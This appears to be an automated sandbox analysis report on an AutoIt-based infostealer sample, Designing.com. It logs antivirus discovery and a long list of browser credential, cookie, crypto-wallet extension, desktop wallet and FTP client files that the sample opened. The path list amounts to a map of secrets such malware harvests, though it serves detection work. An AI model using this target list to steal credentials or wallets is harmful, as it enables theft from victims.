Source: Designing.com, 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmp, Designing.com, 0000000C.00000003.2438306481.000000000528E000.00000004.00000800.00020000.00000000.sdmp, Sun.9.dr, Designing.com.2.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Designing.com Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DC0A08 cpuid 12_2_00DC0A08
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DFE5F4 GetLocalTime, 12_2_00DFE5F4
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DFE652 GetUserNameW, 12_2_00DFE652
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Code function: 12_2_00DDBCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 12_2_00DDBCD2
Source: C:\Users\user\Desktop\Setup.exe Code function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406831
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: Process Memory Space: Designing.com PID: 6380, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *exodus*
Source: Designing.com, 0000000C.00000003.2788056081.000000000416A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: Designing.com, 0000000C.00000003.2787563935.000000000419C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: Designing.com, 0000000C.00000003.2558937419.000000000419A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"WB
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\FTPbox Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\FTPGetter Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\FTPInfo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\ProgramData\SiteDesigner\3D-FTP Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\FTPRush Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\124531\Designing.com File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: Designing.com Binary or memory string: WIN_81
Source: Designing.com Binary or memory string: WIN_XP
